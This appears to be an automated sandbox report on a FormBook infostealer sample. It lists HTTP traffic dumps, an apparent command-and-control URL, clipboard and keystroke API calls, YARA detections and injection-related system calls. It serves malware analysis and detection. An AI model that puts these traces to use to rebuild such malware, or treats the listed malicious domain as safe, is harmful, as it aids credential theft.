Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:53 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:55 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:57:58 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36

Source: uDeZXYtzetmc.exe, 00000008.00000002.3339789975.0000000004A8E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ampsamkok88.shop
Source: uDeZXYtzetmc.exe, 00000008.00000002.3339789975.0000000004A8E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ampsamkok88.shop/d5ko/
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: calc.exe, 00000005.00000002.3338976521.0000000006572000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fburl.com
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3340981972.0000000007F40000.00000004.00000800.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: calc.exe, 00000005.00000002.3336312350.0000000003322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: calc.exe, 00000005.00000002.3336312350.0000000003322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: calc.exe, 00000005.00000003.2084588354.00000000081C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: calc.exe, 00000005.00000002.3336312350.0000000003322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: calc.exe, 00000005.00000002.3336312350.0000000003322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: calc.exe, 00000005.00000002.3336312350.0000000003322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: calc.exe, 00000005.00000002.3336312350.0000000003322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://optimize.google.com
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://td.doubleclick.net
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3340981972.0000000007F40000.00000004.00000800.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3340981972.0000000007F40000.00000004.00000800.00020000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
Source: calc.exe, 00000005.00000002.3341110757.00000000081EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: calc.exe, 00000005.00000002.3338976521.0000000005D98000.00000004.10000000.00040000.00000000.sdmp, calc.exe, 00000005.00000002.3340981972.0000000007F40000.00000004.00000800.00020000.00000000.sdmp, calc.exe, 00000005.00000002.3338976521.0000000005A74000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002CE8000.00000004.00000001.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.00000000029C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2195895650.0000000037794000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleanalytics.com
Source: calc.exe, 00000005.00000002.3338976521.0000000005C06000.00000004.10000000.00040000.00000000.sdmp, uDeZXYtzetmc.exe, 00000008.00000002.3338106595.0000000002B56000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleoptimize.com

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_01004164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_01004164

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_01004164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_01004164

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_01003F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_01003F66

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_00FF001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00FF001C

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe

Code function: 0_2_0101CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0101CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3339789975.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337814220.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3337904814.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3335955747.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887341354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1887721953.0000000003990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1888111651.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3337603286.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\bkTW1FbgHN.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00F93B3A
Source: bkTW1FbgHN.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: bkTW1FbgHN.exe, 00000000.00000000.1473471653.0000000001044000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7ca5799d-e
Source: bkTW1FbgHN.exe, 00000000.00000000.1473471653.0000000001044000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_0e901748-5
Source: bkTW1FbgHN.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2d96aa90-b
Source: bkTW1FbgHN.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_73ddfa01-3

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CD73 NtClose,	2_2_0042CD73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B60 NtClose,LdrInitializeThunk,	2_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,	2_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74340 NtSetContextThread,	2_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A74650 NtSuspendThread,	2_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BA0 NtEnumerateValueKey,	2_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72B80 NtQueryInformationFile,	2_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BE0 NtQueryValueKey,	2_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72BF0 NtAllocateVirtualMemory,	2_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AB0 NtWaitForSingleObject,	2_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AF0 NtWriteFile,	2_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72AD0 NtReadFile,	2_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FA0 NtQuerySection,	2_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FB0 NtResumeThread,	2_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F90 NtProtectVirtualMemory,	2_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72FE0 NtCreateFile,	2_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F30 NtCreateSection,	2_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72F60 NtCreateProcessEx,	2_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken,	2_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E80 NtReadVirtualMemory,	2_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72EE0 NtQueueApcThread,	2_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72E30 NtWriteVirtualMemory,	2_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DB0 NtEnumerateKey,	2_2_03A72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72DD0 NtDelayExecution,	2_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D30 NtUnmapViewOfSection,	2_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D00 NtSetInformationFile,	2_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72D10 NtMapViewOfSection,	2_2_03A72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CA0 NtQueryInformationToken,	2_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CF0 NtOpenProcess,	2_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72CC0 NtQueryVirtualMemory,	2_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A72C00 NtQueryInformationProcess,	2_2_03A72C00
